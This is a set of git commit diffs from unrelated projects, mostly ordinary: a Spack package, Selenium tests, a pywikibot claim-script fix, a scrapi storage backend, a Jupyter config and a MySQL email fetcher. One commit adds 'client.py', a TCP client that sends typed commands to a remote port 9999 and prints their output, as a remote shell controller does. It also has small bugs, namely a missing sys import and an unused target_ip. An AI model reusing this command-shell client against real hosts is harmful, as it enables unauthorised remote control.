+# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass PyPyperclip(PythonPackage):%0A %22%22%22A cross-platform clipboard module for Python.%22%22%22%0A%0A homepage = %22https://github.com/asweigart/pyperclip%22%0A url = %22https://pypi.io/packages/source/p/pyperclip/pyperclip-1.7.0.tar.gz%22%0A%0A version('1.7.0', sha256='979325468ccf682104d5dcaf753f869868100631301d3e72f47babdea5700d1c')%0A%0A depends_on('py-setuptools', type='build')%0A
|
|
6427c55bbd51abaef6847e4f2af239d5977d0048
|
Create client.py
|
client.py
|
client.py
|
Python
| 0
|
@@ -0,0 +1,555 @@
+import socket%0A%0Atarget_host = %220.0.0.0%22%0Atarget_port = 9999%0A%0Aif(len(sys.argv) %3E 1):%0A try:%0A target_ip = sys.argv%5B1%5D%0A target_port = int(sys.argv%5B2%5D)%0A except Exception:%0A pass #lazy%0A%0A%0Aclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A%0Aclient.connect((target_host, target_port))%0A'''%0Aclient.send(%22ls%22)%0A%0Aresponse = client.recv(4096)%0A%0Aprint %22Output: %22 + response.rstrip(%22%5Cn%22)%0A'''%0Awhile True:%0A%09lmao = raw_input(%22Enter Command:%5Cn%22)%0A%09client.send(lmao)%0A%09response = client.recv(4096)%0A%09print %22Output: %22 + response.rstrip(%22%5Cn%22)%0A
|
|
04d6765c14de3d6d5eb36d9ad268012f9e7625bc
|
add test for search items #30
|
vagrant/tradyfit/tests/functional/test_search.py
|
vagrant/tradyfit/tests/functional/test_search.py
|
Python
| 0
|
@@ -0,0 +1,2680 @@
+# -*- coding: utf-8 -*-%0Aimport re%0Afrom bs4 import BeautifulSoup%0Afrom helper import SeleniumTestCase%0Aimport page%0A%0A%0Aclass SearchTestCase(SeleniumTestCase):%0A%0A @classmethod%0A def setUpClass(cls):%0A # connect to webdriver, create app, launch server in thread%0A super(SearchTestCase, cls).setUpClass()%0A%0A @classmethod%0A def tearDownClass(cls):%0A # stop the server, destroy db and remove app context%0A super(SearchTestCase, cls).tearDownClass()%0A%0A%0A def setUp(self):%0A if not self.client:%0A self.skipTest('Web browser not available')%0A%0A def tearDown(self):%0A pass%0A%0A%0A def test_search_no_login(self):%0A '''Verify a not logged in user see items on a search ordered%0A by time creation%0A 1. Go to home page%0A 2. Make a search with the word 't-shirt'%0A 3. Verify you are redirected to the search results page%0A 4. Verify items are displayed by time creation (last first)%0A '''%0A self.client.get('http://localhost:5000')%0A%0A # home page object%0A home_page = page.HomePage(self.client)%0A self.assertTrue(home_page.is_title_matches)%0A%0A # make a search%0A home_page.make_search('t-shirt')%0A%0A # assert the items appears in the page ordered by desc time creation%0A soup = BeautifulSoup(self.client.page_source)%0A items = soup.find_all(%22div%22, id=re.compile(%22%5Eitem-%22))%0A self.assertTrue(len(items) == 2)%0A self.assertTrue('Lakers t-shirt' in str(items%5B0%5D))%0A%0A%0A def test_search_login(self):%0A '''Verify a logged in user see items on a search ordered%0A by nearby location%0A 1. Go to home page%0A 2. Click on Login link%0A 3. Fill login form and submit%0A 4. Make a search with the word 'bike'%0A 5. Verify you are redirected to the search results page%0A 6. 
Verify items are displayed by time creation (last first)%0A '''%0A self.client.get('http://localhost:5000')%0A%0A # home page object%0A home_page = page.HomePage(self.client)%0A self.assertTrue(home_page.is_title_matches)%0A%0A # navigate to login page%0A home_page.go_to_login()%0A%0A login_page = page.LoginPage(self.client)%0A self.assertTrue(login_page.is_title_matches)%0A%0A # login user US%0A login_page.login(self.app.config%5B'FB_TEST_EMAIL'%5D,%0A self.app.config%5B'FB_TEST_PWD'%5D)%0A%0A # make a search%0A home_page.make_search('t-shirt')%0A%0A search_page = page.SearchPage(self.client)%0A self.assertTrue(search_page.is_title_matches)%0A%0A # assert the items appears in the page ordered by user nearby%0A soup = BeautifulSoup(self.client.page_source)%0A items = soup.find_all(%22div%22, id=re.compile(%22%5Eitem-%22))%0A self.assertTrue(len(items) == 2)%0A self.assertTrue('Soccer t-shirt' in str(items%5B0%5D))%0A%0A #log out user%0A search_page.go_to_log_out()%0A%0A
|
|
ad3744acef6d855fcc074c7412c3e224d5a8f205
|
add missing file
|
saga/utils/pty_exceptions.py
|
saga/utils/pty_exceptions.py
|
Python
| 0.000003
|
@@ -0,0 +1,1687 @@
+%0A%0Aimport saga.exceptions as se%0A%0A# ----------------------------------------------------------------%0A#%0Adef translate_exception (e, msg=None) :%0A %22%22%22%0A In many cases, we should be able to roughly infer the exception cause%0A from the error message -- this is centrally done in this method. If%0A possible, it will return a new exception with a more concise error%0A message and appropriate exception type.%0A %22%22%22%0A%0A if not issubclass (e.__class__, se.SagaException) :%0A # we do not touch non-saga exceptions%0A return e%0A%0A if not issubclass (e.__class__, se.NoSuccess) :%0A # this seems to have a specific cause already, leave it alone%0A return e%0A%0A cmsg = e._plain_message%0A%0A if msg :%0A cmsg = %22%25s (%25s)%22 %25 (cmsg, msg)%0A%0A lmsg = cmsg.lower ()%0A%0A if 'could not resolve hostname' in lmsg :%0A e = se.BadParameter (cmsg)%0A%0A elif 'connection timed out' in lmsg :%0A e = se.BadParameter (cmsg)%0A%0A elif 'auth' in lmsg :%0A e = se.AuthorizationFailed (cmsg)%0A%0A elif 'pass' in lmsg :%0A e = se.AuthenticationFailed (cmsg)%0A%0A elif 'ssh_exchange_identification' in lmsg :%0A e = se.AuthenticationFailed (%22too frequent login attempts, or sshd misconfiguration: %25s%22 %25 cmsg)%0A%0A elif 'denied' in lmsg :%0A e = se.PermissionDenied (cmsg)%0A%0A elif 'shared connection' in lmsg :%0A e = se.NoSuccess (%22Insufficient system resources: %25s%22 %25 cmsg)%0A%0A elif 'pty allocation' in lmsg :%0A e = se.NoSuccess (%22Insufficient system resources: %25s%22 %25 cmsg)%0A%0A elif 'Connection to master closed' in lmsg :%0A e = se.NoSuccess (%22Connection failed (insufficient system resources?): %25s%22 %25 cmsg)%0A%0A return e%0A%0A
|
|
df7a5c4aa4f5898de3c70cef17c3c5031f7e05a6
|
Add support for executing scrapy using -m option of python
|
scrapy/__main__.py
|
scrapy/__main__.py
|
Python
| 0.000007
|
@@ -0,0 +1,77 @@
+from scrapy.cmdline import execute%0A%0Aif __name__ == '__main__':%0A execute()%0A
|
|
3c9d90f2f3177c611b848b136f8bfe9f4a676dd5
|
Fix logic in claimit.py
|
scripts/claimit.py
|
scripts/claimit.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
A script that adds claims to Wikidata items based on a list of pages.
------------------------------------------------------------------------------
Usage:
python pwb.py claimit [pagegenerators] P1 Q2 P123 Q456
You can use any typical pagegenerator (like categories) to provide with a
list of pages. Then list the property-->target pairs to add.
------------------------------------------------------------------------------
For geographic coordinates:
python pwb.py claimit [pagegenerators] P625 [lat-dec],[long-dec],[prec]
[lat-dec] and [long-dec] represent the latitude and longitude respectively,
and [prec] represents the precision. All values are in decimal degrees,
not DMS. If [prec] is omitted, the default precision is 0.0001 degrees.
Example:
python pwb.py claimit [pagegenerators] P625 -23.3991,-52.0910,0.0001
------------------------------------------------------------------------------
By default, claimit.py does not add a claim if one with the same property
already exists on the page. To override this behavior, use the 'exists' option:
python pwb.py claimit [pagegenerators] P246 "string example" -exists:p
Suppose the claim you want to add has the same property as an existing claim
and the "-exists:p" argument is used. Now, claimit.py will not add the claim
if it has the same target, source, and/or the existing claim has qualifiers.
To override this behavior, add 't' (target), 's' (sources), or 'q' (qualifiers)
to the 'exists' argument.
For instance, to add the claim to each page even if one with the same
property and target and some qualifiers already exists:
python pwb.py claimit [pagegenerators] P246 "string example" -exists:ptq
Note that the ordering of the letters in the 'exists' argument does not matter,
but 'p' must be included.
"""
#
# (C) Legoktm, 2013
# (C) Pywikibot team, 2013-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
import pywikibot
from pywikibot import pagegenerators, WikidataBot
# This is required for the text that is shown when you run this script
# with the parameter -help or without parameters.
# Substituted for the &params; placeholder in the module docstring when
# pywikibot renders -help output. Fix: the key had been garbled to
# '\xb6ms;' by an HTML-entity round-trip ('&para' -> '¶'); pywikibot's
# help machinery looks up the literal '&params;' string.
docuReplacements = {
    '&params;': pagegenerators.parameterHelp,
}
class ClaimRobot(WikidataBot):

    """A bot to add Wikidata claims."""

    def __init__(self, generator, claims, exists_arg=''):
        """
        Constructor.

        @param generator: A generator that yields Page objects.
        @type generator: iterator
        @param claims: A list of wikidata claims
        @type claims: list
        @param exists_arg: String specifying how to handle duplicate claims
        @type exists_arg: str
        """
        self.availableOptions['always'] = True
        super(ClaimRobot, self).__init__(use_from_page=None)
        self.generator = generator
        self.claims = claims
        # Keep only the recognised duplicate-handling flags (p/q/s/t).
        self.exists_arg = ''.join(x for x in exists_arg.lower() if x in 'pqst')
        self.cacheSources()
        if self.exists_arg:
            pywikibot.output("'exists' argument set to '%s'" % self.exists_arg)

    def treat(self, page, item):
        """Treat each page."""
        self.current_page = page
        # The generator might yield pages from multiple sites
        source = self.getSource(page.site)

        for claim in self.claims:
            # Existing claims on page of same property
            for existing in item.claims.get(claim.getID(), []):
                # If claim with same property already exists...
                if 'p' not in self.exists_arg:
                    pywikibot.log(
                        'Skipping %s because claim with same property already exists'
                        % (claim.getID(),))
                    pywikibot.log(
                        'Use -exists:p option to override this behavior')
                    break
                # Bug fix: existing claims with a *different* target must not
                # block this claim. Previously the qualifier/source checks
                # below ran for every same-property claim, so the new claim
                # was skipped whenever any unrelated claim of that property
                # lacked qualifiers or sources.
                if not existing.target_equals(claim.getTarget()):
                    continue
                # From here on, ``existing`` has the same property AND the
                # same target; skip unless the 'exists' argument overrides.
                if 't' not in self.exists_arg:
                    pywikibot.log(
                        'Skipping %s because claim with same target already exists'
                        % (claim.getID(),))
                    pywikibot.log(
                        "Append 't' to -exists argument to override this behavior")
                    break
                if 'q' not in self.exists_arg and not existing.qualifiers:
                    pywikibot.log(
                        'Skipping %s because claim without qualifiers already exists'
                        % (claim.getID(),))
                    pywikibot.log(
                        "Append 'q' to -exists argument to override this behavior")
                    break
                if ('s' not in self.exists_arg or not source) and not existing.sources:
                    pywikibot.log(
                        'Skipping %s because claim without source already exists'
                        % (claim.getID(),))
                    pywikibot.log(
                        "Append 's' to -exists argument to override this behavior")
                    break
                if ('s' not in self.exists_arg and source and
                        any(source.getID() in ref and
                            all(snak.target_equals(source.getTarget())
                                for snak in ref[source.getID()])
                            for ref in existing.sources)):
                    pywikibot.log(
                        'Skipping %s because claim with the same source already exists'
                        % (claim.getID(),))
                    pywikibot.log(
                        "Append 's' to -exists argument to override this behavior")
                    break
            else:
                # No existing claim blocked the addition.
                self.user_add_claim(item, claim, page.site)
def main(*args):
    """
    Process command line arguments and invoke bot.

    If args is an empty list, sys.argv is used.

    @param args: command line arguments
    @type args: list of unicode
    @rtype: bool
    """
    exists_arg = ''
    commandline_claims = []

    # Process global args and prepare generator args parser
    local_args = pywikibot.handle_args(args)
    gen = pagegenerators.GeneratorFactory()

    for arg in local_args:
        if arg.startswith('-exists:'):
            # Flags controlling how duplicate claims are handled.
            exists_arg = arg.split(':')[1]
        elif not gen.handleArg(arg):
            # Anything that is not a generator arg is a property/value token.
            commandline_claims.append(arg)

    if len(commandline_claims) % 2:
        pywikibot.error('Incomplete command line property-value pair.')
        return False

    repo = pywikibot.Site().data_repository()

    claims = []
    # Tokens alternate property, value, property, value, ...
    for prop, value in zip(commandline_claims[::2], commandline_claims[1::2]):
        claim = pywikibot.Claim(repo, prop)
        if claim.type == 'wikibase-item':
            target = pywikibot.ItemPage(repo, value)
        elif claim.type == 'string':
            target = value
        elif claim.type == 'globe-coordinate':
            coord_args = [float(c) for c in value.split(',')]
            # Default precision ~10 m at the equator when omitted.
            precision = coord_args[2] if len(coord_args) >= 3 else 0.0001
            target = pywikibot.Coordinate(coord_args[0], coord_args[1],
                                          precision=precision)
        else:
            raise NotImplementedError(
                "%s datatype is not yet supported by claimit.py"
                % claim.type)
        claim.setTarget(target)
        claims.append(claim)

    generator = gen.getCombinedGenerator()
    if not generator:
        pywikibot.bot.suggest_help(missing_generator=True)
        return False

    bot = ClaimRobot(generator, claims, exists_arg)
    bot.run()
    return True
if __name__ == "__main__":
main()
|
Python
| 0
|
@@ -3881,32 +3881,127 @@
break%0A
+ if not existing.target_equals(claim.getTarget()):%0A continue%0A
@@ -4247,79 +4247,8 @@
if
-(existing.target_equals(claim.getTarget()) and%0A
't'
@@ -4269,17 +4269,16 @@
ists_arg
-)
:%0A
|
d94123ba898032e7837aa8a2fd0fe585ed81e2d5
|
Add back a filesystem backend for testing and development
|
scrapi/processing/storage.py
|
scrapi/processing/storage.py
|
Python
| 0
|
@@ -0,0 +1,839 @@
+import os%0Aimport json%0A%0Afrom scrapi.processing.base import BaseProcessor%0A%0A%0Aclass StorageProcessor(BaseProcessor):%0A NAME = 'storage'%0A%0A def process_raw(self, raw):%0A filename = 'archive/%7B%7D/%7B%7D/raw.%7B%7D'.format(raw%5B'source'%5D, raw%5B'docID'%5D, raw%5B'filetype'%5D)%0A if not os.path.exists(os.path.dirname(filename)):%0A os.makedirs(os.path.dirname(filename))%0A%0A with open(filename, 'w') as f:%0A f.write(json.dumps(raw.attributes, indent=4))%0A%0A def process_normalized(self, raw, normalized):%0A filename = 'archive/%7B%7D/%7B%7D/normalized.json'.format(raw%5B'source'%5D, raw%5B'docID'%5D, raw%5B'filetype'%5D)%0A if not os.path.exists(os.path.dirname(filename)):%0A os.makedirs(os.path.dirname(filename))%0A%0A with open(filename, 'w') as f:%0A f.write(json.dumps(normalized.attributes, indent=4))%0A
|
|
e6699947ebde4d51b1bd8b6016879d4917d7a648
|
implement initial base exception class and httperror exception class
|
scup/exceptions.py
|
scup/exceptions.py
|
Python
| 0
|
@@ -0,0 +1,493 @@
+class ScupPythonError(Exception):%0A%09%22%22%22 Base class for exceptions raised by scup-python. %22%22%22%0A%0A%0Aclass ScupError(ScupPythonError):%0A%09%22%22%22 Exception for Scup errors. %22%22%22%0A%09def __init__(self, message=None, code=None, error_data=None):%0A%09%09self.message = message%0A%09%09self.code = code%0A%09%09self.error_data = error_data%0A%0A%09%09if self.code:%0A%09%09%09message = '%5B%7B%7D%5D %7B%7D'.format(self.code, self.message)%0A%0A%09%09super(ScupError, self).__init__(message)%0A%0Aclass HTTPError(ScupPythonError):%0A%09%22%22%22 Exception for transport errors. %22%22%22
|
|
ded34849d9eb2feb51b9ad7f31e210db3a28c7e1
|
change case
|
aleph/assets.py
|
aleph/assets.py
|
import os
from flask.ext.assets import Bundle
from aleph.core import assets, app
deps_assets = Bundle(
'vendor/jquery/dist/jquery.js',
'vendor/angular/angular.js',
'vendor/ng-debounce/angular-debounce.js',
'vendor/angular-route/angular-route.js',
'vendor/angular-animate/angular-animate.js',
'vendor/angular-loading-bar/build/loading-bar.js',
'vendor/angular-truncate/src/truncate.js',
'vendor/angular-bootstrap/ui-bootstrap-tpls.js',
'vendor/nginfinitescroll/build/ng-infinite-scroll.js',
filters='uglifyjs',
output='assets/deps.js'
)
js_files = []
for (root, dirs, files) in os.walk(os.path.join(app.static_folder, 'js')):
for file_name in files:
file_path = os.path.relpath(os.path.join(root, file_name),
app.static_folder)
js_files.append(file_path)
app_assets = Bundle(*js_files,
filters='uglifyjs',
output='assets/app.js')
css_assets = Bundle(
'style/aleph.scss',
'vendor/angular-loading-bar/build/loading-bar.css',
'style/animations.css',
filters='scss',
output='assets/style.css'
)
assets.register('deps', deps_assets)
assets.register('app', app_assets)
assets.register('css', css_assets)
|
Python
| 0.00005
|
@@ -480,17 +480,17 @@
r/ng
-i
+I
nfinite
-s
+S
crol
|
b2d60408688cc1bf27842d8744d1048a64b00e94
|
Add script to get public registrations for staff members
|
scripts/staff_public_regs.py
|
scripts/staff_public_regs.py
|
Python
| 0
|
@@ -0,0 +1,1366 @@
+# -*- coding: utf-8 -*-%0A%22%22%22Get public registrations for staff members.%0A%0A python -m scripts.staff_public_regs%0A%22%22%22%0Afrom collections import defaultdict%0Aimport logging%0A%0Afrom modularodm import Q%0A%0Afrom website.models import Node, User%0Afrom website.app import init_app%0A%0Alogger = logging.getLogger('staff_public_regs')%0A%0ASTAFF_GUIDS = %5B%0A 'jk5cv', # Jeff%0A 'cdi38', # Brian%0A 'edb8y', # Johanna%0A 'hsey5', # Courtney%0A '5hdme', # Melissa%0A%5D%0A%0Adef main():%0A init_app(set_backends=True, routes=False, mfr=False)%0A staff_registrations = defaultdict(list)%0A users = %5BUser.load(each) for each in STAFF_GUIDS%5D%0A for registration in Node.find(Q('is_registration', 'eq', True) & Q('is_public', 'eq', True)):%0A for user in users:%0A if registration in user.node__contributed:%0A staff_registrations%5Buser._id%5D.append(registration)%0A%0A for uid in staff_registrations:%0A user = User.load(uid)%0A user_regs = staff_registrations%5Buid%5D%0A logger.info('%7B%7D (%7B%7D) on %7B%7D Public Registrations:'.format(%0A user.fullname,%0A user._id,%0A len(user_regs))%0A )%0A for registration in user_regs:%0A logger.info('%5Ct%7B%7D (%7B%7D): %7B%7D'.format(registration.title,%0A registration._id,%0A registration.absolute_url)%0A )%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
b77f90c4372161243fcabb3eddbe4d35b4792bfc
|
Create jupyter_notebook_config.py
|
jupyter_notebook_config.py
|
jupyter_notebook_config.py
|
Python
| 0.000002
|
@@ -0,0 +1,1045 @@
+# Copyright 2015 The TensorFlow Authors. All Rights Reserved.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A# ==============================================================================%0Aimport os%0Afrom IPython.lib import passwd%0A%0Ac.NotebookApp.ip = '*'%0Ac.NotebookApp.port = 8888%0Ac.NotebookApp.open_browser = False%0Ac.MultiKernelManager.default_kernel_name = 'python2'%0A%0A# sets a password if PASSWORD is set in the environment%0Aif 'PASSWORD' in os.environ:%0A c.NotebookApp.password = passwd(os.environ%5B'PASSWORD'%5D)%0A del os.environ%5B'PASSWORD'%5D%0A
|
|
d4a8c33d50a7c130d6203ef6332a241392516ba2
|
Create database.py
|
database.py
|
database.py
|
Python
| 0.000001
|
@@ -0,0 +1,807 @@
+#!/usr/bin/python%0Aimport MySQLdb%0A%0Adef getemail():%0A alist=%5B%5D%0A # Open database connection Replace username, password with your username password and dbname with the name of database%0A db = MySQLdb.connect(%22localhost%22,%22username%22,%22password%22,%22dbname%22 )%0A # prepare a cursor object using cursor() method%0A cursor = db.cursor()%0A #replace emails with your table name containing a column 'email' holding the email addresses%0A sql = %22SELECT * FROM emails%22%0A try:%0A # Execute the SQL command%0A cursor.execute(sql)%0A # Fetch all the rows in a list of lists.%0A results = cursor.fetchall()%0A for row in results:%0A alist.append(row%5B'email'%5D)%0A %0A except:%0A print %22Error: unable to fecth data%22%0A %0A%0A # disconnect from server%0A db.close()%0A return alist%0A
|
|
5bb77cb83ea443e5e3ae4b4000763e4289f8e87a
|
add timeout and retry for ssh
|
smoketests/base.py
|
smoketests/base.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import boto
import commands
import httplib
import os
import paramiko
import sys
import time
import unittest
from boto.ec2.regioninfo import RegionInfo
from smoketests import flags
SUITE_NAMES = '[image, instance, volume]'
FLAGS = flags.FLAGS
flags.DEFINE_string('suite', None, 'Specific test suite to run ' + SUITE_NAMES)
boto_v6 = None
class SmokeTestCase(unittest.TestCase):
def connect_ssh(self, ip, key_name):
# TODO(devcamcar): set a more reasonable connection timeout time
key = paramiko.RSAKey.from_private_key_file('/tmp/%s.pem' % key_name)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
client.connect(ip, username='root', pkey=key)
return client
def can_ping(self, ip, command="ping"):
"""Attempt to ping the specified IP, and give up after 1 second."""
# NOTE(devcamcar): ping timeout flag is different in OSX.
if sys.platform == 'darwin':
timeout_flag = 't'
else:
timeout_flag = 'w'
status, output = commands.getstatusoutput('%s -c1 -%s1 %s' %
(command, timeout_flag, ip))
return status == 0
def wait_for_running(self, instance, tries=60, wait=1):
"""Wait for instance to be running"""
for x in xrange(tries):
instance.update()
if instance.state.startswith('running'):
return True
time.sleep(wait)
else:
return False
def wait_for_ping(self, ip, command="ping", tries=120):
"""Wait for ip to be pingable"""
for x in xrange(tries):
if self.can_ping(ip, command):
return True
else:
return False
def wait_for_ssh(self, ip, key_name, tries=30, wait=5):
"""Wait for ip to be sshable"""
for x in xrange(tries):
try:
conn = self.connect_ssh(ip, key_name)
conn.close()
except Exception, e:
time.sleep(wait)
else:
return True
else:
return False
def connection_for_env(self, **kwargs):
"""
Returns a boto ec2 connection for the current environment.
"""
access_key = os.getenv('EC2_ACCESS_KEY')
secret_key = os.getenv('EC2_SECRET_KEY')
clc_url = os.getenv('EC2_URL')
if not access_key or not secret_key or not clc_url:
raise Exception('Missing EC2 environment variables. Please source '
'the appropriate novarc file before running this '
'test.')
parts = self.split_clc_url(clc_url)
if FLAGS.use_ipv6:
return boto_v6.connect_ec2(aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
is_secure=parts['is_secure'],
region=RegionInfo(None,
'nova',
parts['ip']),
port=parts['port'],
path='/services/Cloud',
**kwargs)
return boto.connect_ec2(aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
is_secure=parts['is_secure'],
region=RegionInfo(None,
'nova',
parts['ip']),
port=parts['port'],
path='/services/Cloud',
**kwargs)
def split_clc_url(self, clc_url):
"""
Splits a cloud controller endpoint url.
"""
parts = httplib.urlsplit(clc_url)
is_secure = parts.scheme == 'https'
ip, port = parts.netloc.split(':')
return {'ip': ip, 'port': int(port), 'is_secure': is_secure}
def create_key_pair(self, conn, key_name):
try:
os.remove('/tmp/%s.pem' % key_name)
except:
pass
key = conn.create_key_pair(key_name)
key.save('/tmp/')
return key
def delete_key_pair(self, conn, key_name):
conn.delete_key_pair(key_name)
try:
os.remove('/tmp/%s.pem' % key_name)
except:
pass
def bundle_image(self, image, tempdir='/tmp', kernel=False):
cmd = 'euca-bundle-image -i %s -d %s' % (image, tempdir)
if kernel:
cmd += ' --kernel true'
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n %s' % (cmd, output)
raise Exception(output)
return True
def upload_image(self, bucket_name, image, tempdir='/tmp'):
cmd = 'euca-upload-bundle -b '
cmd += '%s -m %s/%s.manifest.xml' % (bucket_name, tempdir, image)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n %s' % (cmd, output)
raise Exception(output)
return True
def delete_bundle_bucket(self, bucket_name):
cmd = 'euca-delete-bundle --clear -b %s' % (bucket_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print '%s -> \n%s' % (cmd, output)
raise Exception(output)
return True
TEST_DATA = {}
class UserSmokeTestCase(SmokeTestCase):
def setUp(self):
global TEST_DATA
self.conn = self.connection_for_env()
self.data = TEST_DATA
|
Python
| 0
|
@@ -1094,16 +1094,82 @@
_NAMES)%0A
+flags.DEFINE_integer('ssh_tries', 3, 'Numer of times to try ssh')%0A
boto_v6
@@ -1262,81 +1262,8 @@
e):%0A
- # TODO(devcamcar): set a more reasonable connection timeout time%0A
@@ -1328,32 +1328,96 @@
em' %25 key_name)%0A
+ tries = 0%0A while(True):%0A try:%0A
client =
@@ -1442,24 +1442,32 @@
t()%0A
+
+
client.set_m
@@ -1515,16 +1515,24 @@
licy())%0A
+
@@ -1579,31 +1579,226 @@
=key
-)%0A return client
+, timeout=5)%0A return client%0A except (paramiko.AuthenticationException, paramiko.SSHException):%0A tries += 1%0A if tries == FLAGS.ssh_tries:%0A raise
%0A%0A
|
cb73106d4a47a21f82021794234672600cceb2c6
|
Add fix_genre_counts
|
populate_database/fix_genre_counts.py
|
populate_database/fix_genre_counts.py
|
Python
| 0.000018
|
@@ -0,0 +1,924 @@
+#!/usr/bin/python%0A%0A# we've been outputting stuff to text so now I get to wedge it into a database%0A# funtimes%0A%0A# set up the database with %60sqlite3 netflix_genres.sqlite %3C create_tables.sql%60%0A%0Aimport codecs%0Aimport sqlite3%0Aimport sys%0A%0Aconn = sqlite3.connect('netflix.sqlite')%0Ac = conn.cursor()%0A%0Ac.execute('SELECT genre_id, name, movie_count FROM genres WHERE name != %22%22 ORDER BY name')%0Agenres = c.fetchall()%0A%0Aupdates = %5B%5D%0A%0Afor genre in genres:%0A (genre_id, name, movie_count) = genre%0A%0A genre_str = '%25'+'%2505i'%25 genre_id+'%25'%0A c.execute(%22SELECT COUNT(1) FROM movies WHERE genres LIKE ?%22, (genre_str,))%0A result = c.fetchone()%5B0%5D%0A%0A if result %3E movie_count or movie_count == '':%0A updates.append((result, genre_id))%0A # print genre_id, result, movie_count, name%0A%0Aprint updates%0A%0Aprint %22... Inserting%22%0A%0Ac.executemany('UPDATE genres SET movie_count = ? WHERE genre_id = ?', updates)%0A%0Aconn.commit()%0Aconn.close()%0A
|
|
d74f0d174f509b0a65e5643356af8eff1f5a4ca8
|
Add a snippet.
|
python/scipy/write_stereo_wav_file.py
|
python/scipy/write_stereo_wav_file.py
|
Python
| 0.000002
|
@@ -0,0 +1,716 @@
+#!/usr/bin/env python3%0A# -*- coding: utf-8 -*-%0A%0A# Read the content of an audio wave file (.wav)%0A# See: http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.io.wavfile.write.html%0A%0Aimport numpy as np%0Afrom scipy.io import wavfile%0A%0Adef sin_wave(freq1, freq2, num_frames, rate):%0A data_list_1 = %5Bint(127 * (np.sin(t/float(rate) * freq1 * 2. * np.pi) + 1)) for t in range(num_frames)%5D%0A data_list_2 = %5Bint(127 * (np.sin(t/float(rate) * freq2 * 2. * np.pi) + 1)) for t in range(num_frames)%5D%0A data_list = %5Bdata_list_1, data_list_2%5D%0A return np.array(data_list, dtype=np.int8).T%0A%0Arate = 24000%0Anum_frames = 48000%0A%0Anparray = sin_wave(440, 880, num_frames, rate)%0A%0Awavfile.write(%22./test.wav%22, rate, nparray)%0A
|
|
181832a67d3fa3a4993d495dc9db12fdae7329f7
|
add context processor tests
|
clastic/tests/test_context_proc.py
|
clastic/tests/test_context_proc.py
|
Python
| 0.000001
|
@@ -0,0 +1,2865 @@
+from __future__ import unicode_literals%0Afrom nose.tools import eq_, raises%0A%0Aimport json%0A%0Afrom werkzeug.test import Client%0Afrom werkzeug.wrappers import BaseResponse%0A%0Afrom clastic import Application, json_response%0Afrom clastic.middleware import SimpleContextProcessor, ContextProcessor%0Afrom common import hello_world, hello_world_ctx, RequestProvidesName%0A%0A%0Adef test_simple_ctx_proc():%0A add_name_lang = SimpleContextProcessor(name='Kurt', language='en')%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name_lang%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does not overwrite%0A yield eq_, resp_data%5B'language'%5D, 'en'%0A%0A%0Adef test_ctx_proc_req():%0A req_provides_name = RequestProvidesName()%0A add_name_lang = ContextProcessor(%5B'name'%5D, %7B'language': 'en'%7D)%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Breq_provides_name, add_name_lang%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'world' # does not overwrite%0A yield eq_, resp_data%5B'language'%5D, 'en'%0A%0A resp = c.get('/?name=Alex')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'Alex' # still does not overwrite%0A%0A%0Adef test_ctx_proc_overwrite():%0A add_name = ContextProcessor(defaults=%7B'name': 'Kurt'%7D, overwrite=True)%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A resp_data = json.loads(resp.data)%0A yield eq_, resp_data%5B'name'%5D, 'Kurt' # does overwrite%0A%0A%0Adef test_ctx_proc_empty():%0A add_name = ContextProcessor()%0A app = Application(%5B('/', hello_world_ctx, json_response)%5D,%0A middlewares=%5Badd_name%5D)%0A c = Client(app, BaseResponse)%0A resp = c.get('/')%0A 
